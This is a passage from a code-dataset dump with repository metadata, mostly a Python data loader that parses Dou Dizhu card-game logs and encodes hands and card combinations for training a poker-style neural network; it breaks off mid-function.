] | 1 | 2021-08-02T15:09:29.000Z | 2021-08-02T15:09:29.000Z | from .vipcca import VAE, CVAE, CVAE2, CVAE3 | 43 | 43 | 0.767442 | 7 | 43 | 4.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0.139535 | 43 | 1 | 43 | 43 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c04aa05926fe5ebd7c4127656aaeecea1f03b28a | 26 | py | Python | malcolm/modules/ca/__init__.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
] | null | null | null | malcolm/modules/ca/__init__.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
] | null | null | null | malcolm/modules/ca/__init__.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
] | null | null | null | from . import util, parts
| 13 | 25 | 0.730769 | 4 | 26 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 26 | 1 | 26 | 26 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fbe2c7ab571fa864a69fdac3f0734a42347a7838 | 101,743 | py | Python | data/DataLoader.py | deecamp2019-group20/CNN_PokerNet | 751576cb941be57c8a37656feaff14b414c3dcb2 | [
"MIT"
] | 1 | 2019-12-12T09:01:49.000Z | 2019-12-12T09:01:49.000Z | data/DataLoader.py | deecamp2019-group20/CNN_PokerNet | 751576cb941be57c8a37656feaff14b414c3dcb2 | [
"MIT"
] | 1 | 2019-11-25T13:43:45.000Z | 2019-11-25T13:43:45.000Z | data/DataLoader.py | deecamp2019-group20/CNN_PokerNet | 751576cb941be57c8a37656feaff14b414c3dcb2 | [
"MIT"
] | 1 | 2020-03-15T06:20:04.000Z | 2020-03-15T06:20:04.000Z | import numpy as np
import argparse
import os
import pandas as pd
import sys
sys.path.append('../')
from game.r import get_moves
from copy import copy
import random
# import math
# import lmdb
"""
In engine, this get_moves() is used as below:
get_moves(self.__cards_left, self.game.last_move)
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-i',
'--inputFile',
type=str,
default='./landlord_test.log',
help='the path towards the log file in order to read data'
)
parser.add_argument(
'-pid',
'--personID',
type=int,
default=0,
help=(
'the ID for the player (winner).'
'0:landlord, 1:landlor_down, 2:landlord_up')
)
parser.add_argument(
'-s',
'--save_dir',
type=str,
help='The generated mdb file save dir',
default='./train'
)
parser.add_argument(
'-nT',
'--train_num',
type=int,
help='The number of game process to be train dataset',
default=330000
)
# modified
parser.add_argument(
'--pass',
action='store_true',
help='obstruct all pass action',
default=False
)
opt = parser.parse_args()
print(opt)
def split_handcards(cards):
# Split Cards Series into a prettier list
r""" Handcards string spliter
Split Cards Series into a prettier list which sorted DESCEDNING
Args:
cards: a string, which indicate a group of cards
Output:
hand_cards: a string
"""
hand_cards = []
cards_rank = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
for card in cards:
# NOTE: '10' contrains 2 chars which should be seperately considered
if card != '1' and card != '0':
hand_cards.append(card)
elif card == '1':
hand_cards.append('10')
elif card == '0':
pass
else:
pass
# sort
length = len(hand_cards)
for index in range(length):
for i in range(1, length - index):
if (
cards_rank.index(hand_cards[i - 1]) <
cards_rank.index(hand_cards[i])):
hand_cards[i-1], hand_cards[i] = hand_cards[i], hand_cards[i-1]
return hand_cards
def findByRow(mat, row):
return np.where((mat == row).all(1))[0]
def cards_rank_encode(cards):
r""" Cards rank number encoder for binary array
Convert a card rank list into binary numpy array
Args:
cards: A list of card ranks
Output:
A numpy array which only contain 0 or 1
and the size of this array is 15 * 4
"""
# NOTE. Here we are using the bool type of numpy array
binary_array = np.zeros((15, 4), dtype=bool)
card_ranks = [
'3', '4', '5', '6', '7', '8', '9',
'10', 'J', 'Q', 'K', 'A', '2', 'X', 'D']
for card in cards:
if card != 'P':
index = card_ranks.index(card)
for i in range(0, 4):
if binary_array[index][i]:
pass
else:
binary_array[index][i] = 1
break
return binary_array
def cards_rank_encode_np(cards):
r""" Cards rank number encoder for numpy array
Convert a card rank str list into 15-len numpy array
Args:
cards: A str list of card ranks
Output:
A numpy array which has len of 15
which indicare the number of each rank for card
"""
size_array = np.zeros(15, dtype=int)
card_ranks = [
'3', '4', '5', '6', '7', '8', '9',
'10', 'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
# cards = split_handcards(cards)
for card in cards:
if card != 'P':
index = card_ranks.index(card)
size_array[index] += 1
return size_array
def cards_rank_encode_np2bi(cards):
r""" Cards rank number encoder for 2d binary numpy array
Convert a 15-len 1d numpy array to 2d binary numpy array
Args:
cards: A 15-len 1d numpy array, each elem is the count
of the cards with relevant rank
Output:
A numpy array which only contains 0 or 1
and the size of this array is 15*4
"""
# NOTE. Here we are using the bool type of numpy array
binary_array = np.zeros((15, 4), dtype=bool)
for i in range(15):
for j in range(cards[i]):
binary_array[i][j] = 1
return binary_array
def have_trio_in_handcard(handcard):
r""" Find whether there is trio among the handcard
Args:
handcard: a list splited handcard numbers
Return:
Boolen
"""
card_ranks = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
for rank in card_ranks:
if handcard.count(rank) >= 3:
return True
return False
def have_bomb_in_handcard(handcard):
r""" Find whether there is bomb or rocket among the handcard
Args:
handcard: a list splited handcard numbers
Return:
Boolen
"""
card_ranks = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
for rank in card_ranks:
if handcard.count(rank) == 4:
return True
if 'X' in handcard and 'D' in handcard:
return True
return False
def have_plane_in_handcard(handcard):
r""" Find whether there is plane among the handcard
Args:
handcard: a list splited handcard numbers
Return:
Boolen
"""
card_ranks = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
for i in range(0, 11):
if (
handcard.count(card_ranks[i]) >= 3 and
handcard.count(card_ranks[i + 1]) >= 3):
# NOTE: AAA222 is not a MainGroup for plane
return True
return False
def game_process_with_pass(game_process):
r""" Add Pass into Game Process
Args:
game_process: the initial game processing
Return:
process_pass: add pass flag into the game processing part
"""
game_process_list = game_process.split(';')
game_process_landlord = []
game_process_landlord_down = []
game_process_landlord_up = []
cur_player = '0'
for game_step in game_process_list:
game_step_player = game_step.split(',')[0]
game_step_cards = game_step.split(',')[1]
if cur_player == game_step_player:
if cur_player == '0':
game_process_landlord.append(game_step_cards)
# print(
# 'outside while, cur_player: 0'
# 'game_step_card: {}'.format(game_step_cards)
# )
cur_player = '1'
elif cur_player == '1':
game_process_landlord_down.append(game_step_cards)
# print(
# 'outside while, cur_player: 1'
# 'game_step_card: {}'.format(game_step_cards)
# )
cur_player = '2'
elif cur_player == '2':
game_process_landlord_up.append(game_step_cards)
# print(
# 'outside while, cur_player: 2'
# 'game_step_card: {}'.format(game_step_cards)
# )
cur_player = '0'
else:
raise ValueError(
'player could only be 0, 1, 2, got {}'
.format(cur_player)
)
else:
while True:
# find players who passed until the next one played cards
if cur_player != game_step_player:
if cur_player == '0':
game_process_landlord.append('P')
# print(
# 'inside while, cur_player: 0'
# 'game_step_player: {}, game_step_cards: {}'
# .format(game_step_player, game_step_cards)
# )
elif cur_player == '1':
game_process_landlord_down.append('P')
# print(
# 'inside while, cur_player: 1'
# 'game_step_player: {}, game_step_cards: {}'
# .format(game_step_player, game_step_cards)
# )
elif cur_player == '2':
game_process_landlord_up.append('P')
# print(
# 'inside while, cur_player: 2'
# 'game_step_player: {}, game_step_cards: {}'
# .format(game_step_player, game_step_cards)
# )
else:
raise ValueError(
'player could only be 0, 1, 2, got {}'
.format(cur_player)
)
# move to check next player
if cur_player == '0':
cur_player = '1'
# print('cur_player mismatch. Move from 0 to 1')
elif cur_player == '1':
cur_player = '2'
# print('cur_player mismatch. Move from 1 to 2')
elif cur_player == '2':
cur_player = '0'
# print('cur_player mismatch. Move from 2 to 0')
else:
if cur_player == '0':
game_process_landlord.append(game_step_cards)
cur_player = '1'
elif cur_player == '1':
game_process_landlord_down.append(game_step_cards)
cur_player = '2'
elif cur_player == '2':
game_process_landlord_up.append(game_step_cards)
cur_player = '0'
break
return (
game_process_landlord, game_process_landlord_down,
game_process_landlord_up)
def is_singleChain(card_list):
r""" Find whether there is a singlechain in list of cards
Args:
card_list: a list of card
Return:
index: the index of the detected chain among singleChain (start from 0)
Boolen: whether this card_list is a singleChain
"""
cards_rank_chain = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A'
]
if len(card_list) < 5:
return -1, False
else:
for i in range(0, len(card_list) - 1):
if (
card_list[i] in cards_rank_chain and
card_list[i + 1] in cards_rank_chain and
cards_rank_chain.index(card_list[i]) - 1 ==
cards_rank_chain.index(card_list[i + 1])):
pass
else:
return -1, False
chain_start = card_list[-1]
chain_len = len(card_list)
if chain_len == 5:
index = cards_rank_chain.index(chain_start)
elif chain_len == 6:
index = cards_rank_chain.index(chain_start) + 8
elif chain_len == 7:
index = cards_rank_chain.index(chain_start) + 15
elif chain_len == 8:
index = cards_rank_chain.index(chain_start) + 21
elif chain_len == 9:
index = cards_rank_chain.index(chain_start) + 26
elif chain_len == 10:
index = cards_rank_chain.index(chain_start) + 30
elif chain_len == 11:
index = cards_rank_chain.index(chain_start) + 33
elif chain_len == 12:
index = cards_rank_chain.index(chain_start) + 35
else:
raise ValueError(
'the simple chain could not reach length beyond 12, got {}'
.format(card_list)
)
return index, True
def is_doubleChain(card_list):
r""" Find whether there is a double-chain in list of cards
Args:
card_list: a list of card
Return:
index: the index of the detected chain among doubleChain (start from 0)
Boolen: whether this card_list is a doubleChain
"""
cards_rank_chain = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A'
]
if len(card_list) < 6 or len(card_list) % 2 != 0:
return -1, False
else:
for i in range(0, int(len(card_list) / 2) - 1):
if (
card_list[2 * i] in cards_rank_chain and
card_list[2 * (i + 1)] in cards_rank_chain and
card_list[2 * i] == card_list[2 * i + 1] and
card_list[2 * (i + 1)] == card_list[2 * (i + 1) + 1] and
cards_rank_chain.index(card_list[2 * i]) - 1 ==
cards_rank_chain.index(card_list[2 * (i + 1)])):
pass
else:
return -1, False
chain_start = card_list[-1]
chain_len = int(len(card_list) / 2)
if chain_len == 3:
index = cards_rank_chain.index(chain_start)
elif chain_len == 4:
index = cards_rank_chain.index(chain_start) + 10
elif chain_len == 5:
index = cards_rank_chain.index(chain_start) + 19
elif chain_len == 6:
index = cards_rank_chain.index(chain_start) + 27
elif chain_len == 7:
index = cards_rank_chain.index(chain_start) + 34
elif chain_len == 8:
index = cards_rank_chain.index(chain_start) + 40
elif chain_len == 9:
index = cards_rank_chain.index(chain_start) + 45
elif chain_len == 10:
index = cards_rank_chain.index(chain_start) + 49
else:
raise ValueError(
'the double chain could not reach len beyond 2*10, got {}'
.format(card_list)
)
return index, True
def is_trioChain(card_list):
# index start from 0
r""" Find whether this is a trio-chain in list of cards
Args:
card_list: a list of card
Return:
index: the index of the detected chain among trioChain (start from 0)
Boolen: whether this card_list is a trioChain
"""
cards_rank_chain = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A'
]
if len(card_list) < 6 or len(card_list) % 3 != 0:
return -1, False
else:
for i in range(0, int(len(card_list) / 3) - 1):
if (
card_list[3 * i] in cards_rank_chain and
card_list[3 * (i + 1)] in cards_rank_chain and
card_list[3 * i] == card_list[3 * i + 1] ==
card_list[3 * i + 2] and
card_list[3 * (i + 1)] == card_list[3 * (i + 1) + 1] ==
card_list[3 * (i + 1) + 2] and
cards_rank_chain.index(card_list[3 * i]) - 1 ==
cards_rank_chain.index(card_list[3 * (i + 1)])):
pass
else:
return -1, False
chain_start = card_list[-1]
chain_len = int(len(card_list) / 3)
if chain_len == 2:
index = cards_rank_chain.index(chain_start)
elif chain_len == 3:
index = cards_rank_chain.index(chain_start) + 11
elif chain_len == 4:
index = cards_rank_chain.index(chain_start) + 21
elif chain_len == 5:
index = cards_rank_chain.index(chain_start) + 30
elif chain_len == 6:
index = cards_rank_chain.index(chain_start) + 38
else:
raise ValueError(
'the trio chain could not reach length beyond 3*6, got {}'
.format_map(card_list)
)
return index, True
def is_quadr2single(card_list):
# index starts from 1
# NOTE: the 2 single here could also be one pair of Double (2 SAME single)
r""" Find whether this is a 4 cards main group with 2 singles in list of cards
Args:
card_list: a list of card
Return:
index: the index of the detected comb among quadr2single (start from 1)
Boolen: whether this card_list is a quadr2single
"""
cards_rank_simple = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
cards_rank_all = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
if len(card_list) != 6:
return -1, False
else:
if (
card_list[0] == card_list[1] == card_list[2] == card_list[3] and
card_list[4] != card_list[0] and
card_list[5] != card_list[0]):
main_group_num = card_list[0]
# kicker_num_1 <= kicker_num_2
kicker_num_1 = card_list[5]
kicker_num_2 = card_list[4]
# calculate index
index = cards_rank_simple.index(main_group_num) * (91 + 12)
for i in range(0, cards_rank_simple.index(kicker_num_1)):
index += (14 - i)
index += (
cards_rank_simple.index(kicker_num_2) -
cards_rank_simple.index(kicker_num_1) + 1
)
return index, True
elif (
card_list[1] == card_list[2] == card_list[3] == card_list[4] and
card_list[0] != card_list[1] and
card_list[5] != card_list[1]):
main_group_num = card_list[1]
kicker_num_1 = card_list[5]
kicker_num_2 = card_list[0]
# calculate index
index = cards_rank_simple.index(main_group_num) * (91 + 12)
for i in range(0, cards_rank_simple.index(kicker_num_1)):
index += (14 - i)
index += (
cards_rank_all.index(kicker_num_2) -
cards_rank_all.index(kicker_num_1)
)
return index, True
elif (
card_list[2] == card_list[3] == card_list[4] == card_list[5] and
card_list[0] != card_list[2] and
card_list[1] != card_list[2]):
main_group_num = card_list[2]
kicker_num_1 = card_list[1]
kicker_num_2 = card_list[0]
# calculate index
index = cards_rank_simple.index(main_group_num) * (91 + 12)
for i in range(0, cards_rank_all.index(kicker_num_1)):
if i < cards_rank_simple.index(main_group_num):
index += (14 - i)
elif i == cards_rank_simple.index(main_group_num):
pass
else:
index += (15 - i)
if kicker_num_1 == 'X':
index += (
cards_rank_all.index(kicker_num_2) -
cards_rank_all.index(kicker_num_1)
)
else:
index += (
cards_rank_all.index(kicker_num_2) -
cards_rank_all.index(kicker_num_1) + 1
)
return index, True
else:
return -1, False
def is_quadr2double(card_list):
# index start from 1
cards_rank_simple = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
# NOTE: double could not choose from 'X' and 'D'
if len(card_list) != 8:
return -1, False
else:
if (
card_list[0] == card_list[1] == card_list[2] == card_list[3] and
card_list[4] == card_list[5] and
card_list[0] != card_list[4] and
card_list[6] == card_list[7] and
card_list[0] != card_list[6]):
main_group_num = card_list[0]
kicker_num_1 = card_list[6]
kicker_num_2 = card_list[4]
# calculate index
index = cards_rank_simple.index(main_group_num) * 66
for i in range(0, cards_rank_simple.index(kicker_num_1)):
index += (11 - i)
index += (
cards_rank_simple.index(kicker_num_2) -
cards_rank_simple.index(kicker_num_1)
)
return index, True
elif (
card_list[2] == card_list[3] == card_list[4] == card_list[5] and
card_list[0] == card_list[1] and
card_list[0] != card_list[2] and
card_list[6] == card_list[7] and
card_list[6] != card_list[2] and
card_list[0] != card_list[6]):
main_group_num = card_list[2]
kicker_num_1 = card_list[6]
kicker_num_2 = card_list[0]
# calculate index
index = cards_rank_simple.index(main_group_num) * 66
for i in range(0, cards_rank_simple.index(kicker_num_1)):
index += (11 - i)
index += (
cards_rank_simple.index(kicker_num_2) -
cards_rank_simple.index(kicker_num_1) - 1
)
return index, True
elif (
card_list[4] == card_list[5] == card_list[6] == card_list[7] and
card_list[0] == card_list[1] and
card_list[0] != card_list[4] and
card_list[2] == card_list[3] and
card_list[2] != card_list[4] and
card_list[0] != card_list[2]):
main_group_num = card_list[4]
kicker_num_1 = card_list[2]
kicker_num_2 = card_list[0]
# calculate index
index = cards_rank_simple.index(main_group_num) * 66
for i in range(0, cards_rank_simple.index(kicker_num_1)):
if i < cards_rank_simple.index(main_group_num):
index += (11 - i)
elif i == cards_rank_simple.index(main_group_num):
pass
else:
index += (12 - i)
index += (
cards_rank_simple.index(kicker_num_2) -
cards_rank_simple.index(kicker_num_1)
)
return index, True
else:
return -1, False
def is_planeSingleWing(card_list):
r""" discuss whether a card_list is a plane with wings(single) and its index
Plane with Wings(single) need a Trio-Chain to be main group, and
same amount of single cards as the Trio numbers of the Trio-Chain as wings
Args:
card_list: a list of cards
Returns:
index: the index of the plane in this kind of combs, starts from 1
Boolen: Whether this card_list is planeSingleWing
"""
cards_rank_simple = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2'
]
cards_rank_all = [
'3', '4', '5', '6', '7', '8', '9', '10',
'J', 'Q', 'K', 'A', '2', 'X', 'D'
]
if len(card_list) == 8:
index_1, isTrioChain_1 = is_trioChain(card_list[0:6])
index_2, isTrioChain_2 = is_trioChain(card_list[1:7])
index_3, isTrioChain_3 = is_trioChain(card_list[2:])
if isTrioChain_1:
# Get the small head of the trio-chain
plane_small_head = card_list[5]
# Get the 1st small kicker single wing
wing_1_single = card_list[7]
# Get the 2nd small kicker single wing
wing_2_single = card_list[6]
index = cards_rank_simple.index(plane_small_head) * 78
for i in range(0, cards_rank_all.index(wing_1_single)):
index += (12 - i)
index += (
cards_rank_all.index(wing_2_single) -
cards_rank_all.index(wing_1_single)
)
return index, True
elif isTrioChain_2:
# Get the small head of the trio-chain
plane_small_head = card_list[6]
# Get the 1st small kicker single wing
wing_1_single = card_list[7]
# Get the 2nd small kicker single wing
wing_2_single = card_list[0]
index = cards_rank_all.index(plane_small_head) * 78
for i in range(0, cards_rank_all.index(wing_1_single)):
index += (12 - i)
index += (
cards_rank_all.index(wing_2_single) -
cards_rank_all.index(wing_1_single) - 2
)
return index, True
elif isTrioChain_3:
# Get the heads of the trio-chain
plane_small_head = card_list[7]
plane_big_head = card_list[2]
# Get the 1st small kicker single wing
wing_1_single = card_list[1]
# Get the 2nd small kicker single wing
wing_2_single = card_list[0]
index = cards_rank_all.index(plane_small_head) * 78
for i in range(0, cards_rank_all.index(wing_1_single)):
if i < cards_rank_all.index(plane_small_head):
index += (12 - i)
elif i > cards_rank_all.index(plane_big_head):
index += (14 - i)
else:
pass
index += (
cards_rank_all.index(wing_2_single) -
cards_rank_all.index(wing_1_single)
)
return index, True
else:
return -1, False
elif len(card_list) == 12:
index_1, isTrioChain_1 = is_trioChain(card_list[0:9])
index_2, isTrioChain_2 = is_trioChain(card_list[1:10])
index_3, isTrioChain_3 = is_trioChain(card_list[2:11])
index_4, isTrioChain_4 = is_trioChain(card_list[3:])
if isTrioChain_1:
plane_small_head = card_list[8]
plane_big_head = card_list[0]
wing_1_single = card_list[11]
wing_2_single = card_list[10]
wing_3_single = card_list[9]
index = 858 + cards_rank_all.index(plane_small_head) * 220
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((11 - i) * (10 - i) / 2)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += (15 - 3 - i - 1)
index += (
cards_rank_all.index(wing_3_single) -
cards_rank_all.index(wing_2_single)
)
return index, True
elif isTrioChain_2:
plane_small_head = card_list[9]
plane_big_head = card_list[1]
wing_1_single = card_list[11]
wing_2_single = card_list[10]
wing_3_single = card_list[0]
index = 858 + cards_rank_all.index(plane_small_head) * 220
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((11 - i) * (10 - i) / 2)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += (15 - 3 - i - 1)
index += (
cards_rank_all.index(wing_3_single) -
cards_rank_all.index(wing_2_single) - 3
)
return index, True
elif isTrioChain_3:
plane_small_head = card_list[10]
plane_big_head = card_list[2]
wing_1_single = card_list[11]
wing_2_single = card_list[1]
wing_3_single = card_list[0]
index = 858 + cards_rank_all.index(plane_small_head) * 220
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((11 - i) * (10 - i) / 2)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
if i < cards_rank_all.index(plane_small_head):
index += (15 - 3 - i - 1)
elif i > cards_rank_all.index(plane_big_head):
index += (15 - i - 1)
else:
pass
index += (
cards_rank_all.index(wing_3_single) -
cards_rank_all.index(wing_2_single)
)
return index, True
elif isTrioChain_4:
plane_small_head = card_list[11]
plane_big_head = card_list[3]
wing_1_single = card_list[2]
wing_2_single = card_list[1]
wing_3_single = card_list[0]
index = 858 + cards_rank_all.index(plane_small_head) * 220
for i in range(0, cards_rank_all.index(wing_1_single)):
if i < cards_rank_all.index(plane_small_head):
index += int((15 - 3 - i - 1) * (15 - 3 - i - 2) / 2)
elif i > cards_rank_all.index(plane_big_head):
index += int((15 - i - 1) * (15 - i - 2) / 2)
else:
pass
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += (15 - i - 1)
index += (
cards_rank_all.index(wing_3_single) -
cards_rank_all.index(wing_2_single)
)
return index, True
else:
return -1, False
elif len(card_list) == 16:
index_1, isTrioChain_1 = is_trioChain(card_list[0:12])
index_2, isTrioChain_2 = is_trioChain(card_list[1:13])
index_3, isTrioChain_3 = is_trioChain(card_list[2:14])
index_4, isTrioChain_4 = is_trioChain(card_list[3:15])
index_5, isTrioChain_5 = is_trioChain(card_list[4:])
if isTrioChain_1:
plane_small_head = card_list[11]
plane_big_head = card_list[0]
wing_1_single = card_list[15]
wing_2_single = card_list[14]
wing_3_single = card_list[13]
wing_4_single = card_list[12]
index = 858 + 2200 + cards_rank_all.index(plane_small_head) * 330
for i in range(0, cards_rank_all.index(wing_1_single)):
# (15-4-i-1) * (15-4-i-2) * (15-4-i-3) / 3!
index += int((10 - i) * (9 - i) * (8 - i) / 6)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((10 - i) * (9 - i) / 2)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += (10 - i)
index += (
cards_rank_all.index(wing_4_single) -
cards_rank_all.index(wing_3_single)
)
return index, True
elif isTrioChain_2:
plane_small_head = card_list[12]
plane_big_head = card_list[1]
wing_1_single = card_list[15]
wing_2_single = card_list[14]
wing_3_single = card_list[13]
wing_4_single = card_list[0]
index = 858 + 2200 + cards_rank_all.index(plane_small_head) * 330
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((10 - i) * (9 - i) * (8 - i) / 6)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((10 - i) * (9 - i) / 2)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += (10 - i)
index += (
cards_rank_all.index(wing_4_single) -
cards_rank_all.index(wing_3_single) - 4
)
return index, True
elif isTrioChain_3:
plane_small_head = card_list[13]
plane_big_head = card_list[2]
wing_1_single = card_list[15]
wing_2_single = card_list[14]
wing_3_single = card_list[1]
wing_4_single = card_list[0]
index = 858 + 2200 + cards_rank_all.index(plane_small_head) * 330
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((10 - i) * (9 - i) * (8 - i) / 6)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((10 - i) * (9 - i) / 2)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
if i < cards_rank_all.index(plane_small_head):
index += (10 - i)
elif i > cards_rank_all.index(plane_big_head):
index += (14 - i)
else:
pass
index += (
cards_rank_all.index(wing_4_single) -
cards_rank_all.index(wing_3_single)
)
return index, True
elif isTrioChain_4:
plane_small_head = card_list[14]
plane_big_head = card_list[3]
wing_1_single = card_list[15]
wing_2_single = card_list[2]
wing_3_single = card_list[1]
wing_4_single = card_list[0]
index = 858 + 2200 + cards_rank_all.index(plane_small_head) * 330
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((10 - i) * (9 - i) * (8 - i) / 6)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
if i < cards_rank_all.index(plane_small_head):
index += int((10 - i) * (9 - i) / 2)
elif i > cards_rank_all.index(plane_big_head):
index += int((14 - i) * (13 - i) / 2)
else:
pass
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += (14 - i)
index += (
cards_rank_all.index(wing_4_single) -
cards_rank_all.index(wing_3_single)
)
return index, True
elif isTrioChain_5:
plane_small_head = card_list[15]
plane_big_head = card_list[4]
wing_1_single = card_list[3]
wing_2_single = card_list[2]
wing_3_single = card_list[1]
wing_4_single = card_list[0]
index = 858 + 2200 + cards_rank_all.index(plane_small_head) * 330
for i in range(0, cards_rank_all.index(wing_1_single)):
index += int((10 - i) * (9 - i) * (8 - i) / 6)
if i < cards_rank_all.index(plane_small_head):
index += int((10 - i) * (9 - i) * (8 - i) / 6)
elif i > cards_rank_all.index(plane_big_head):
index += int((14 - i) * (13 - i) * (12 - i) / 6)
else:
pass
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((14 - i) * (13 - i) / 2)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += (14 - i)
index += (
cards_rank_all.index(wing_4_single) -
cards_rank_all.index(wing_3_single)
)
return index, True
else:
return -1, False
elif len(card_list) == 20:
index_1, isTrioChain_1 = is_trioChain(card_list[0:15])
index_2, isTrioChain_2 = is_trioChain(card_list[1:16])
index_3, isTrioChain_3 = is_trioChain(card_list[2:17])
index_4, isTrioChain_4 = is_trioChain(card_list[3:18])
index_5, isTrioChain_5 = is_trioChain(card_list[4:19])
index_6, isTrioChain_6 = is_trioChain(card_list[5:])
if isTrioChain_1:
plane_small_head = card_list[14]
plane_big_head = card_list[0]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[17]
wing_4_single = card_list[16]
wing_5_single = card_list[15]
if (
not wing_1_single != wing_2_single !=
wing_3_single != wing_4_single != wing_5_single):
return -1, False
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((9 - i) * (8 - i) * (7 - i) / 6)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
index += (9 - i)
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single)
)
return index, True
elif isTrioChain_2:
plane_small_head = card_list[15]
plane_big_head = card_list[1]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[17]
wing_4_single = card_list[16]
wing_5_single = card_list[0]
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((9 - i) * (8 - i) * (7 - i) / 6)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
cards_rank_all.index(wing_3_single)):
index += int((9 - i) * (8 - i) / 2)
for i in range(
cards_rank_all.index(wing_3_single) + 1,
cards_rank_all.index(wing_4_single)):
index += (9 - i)
index += (
cards_rank_all.index(wing_5_single) -
cards_rank_all.index(wing_4_single) - 5
)
return index, True
elif isTrioChain_3:
plane_small_head = card_list[16]
plane_big_head = card_list[2]
wing_1_single = card_list[19]
wing_2_single = card_list[18]
wing_3_single = card_list[17]
wing_4_single = card_list[1]
wing_5_single = card_list[0]
index = 858 + 2200 + 2970
index += cards_rank_simple.index(plane_small_head) * 252
for i in range(0, cards_rank_all.index(wing_1_single)):
# C_(15 - 5 - i - 1)_4
index += int((9 - i) * (8 - i) * (7 - i) * (6 - i) / 24)
for i in range(
cards_rank_all.index(wing_1_single) + 1,
cards_rank_all.index(wing_2_single)):
index += int((9 - i) * (8 - i) * (7 - i) / 6)
for i in range(
cards_rank_all.index(wing_2_single) + 1,
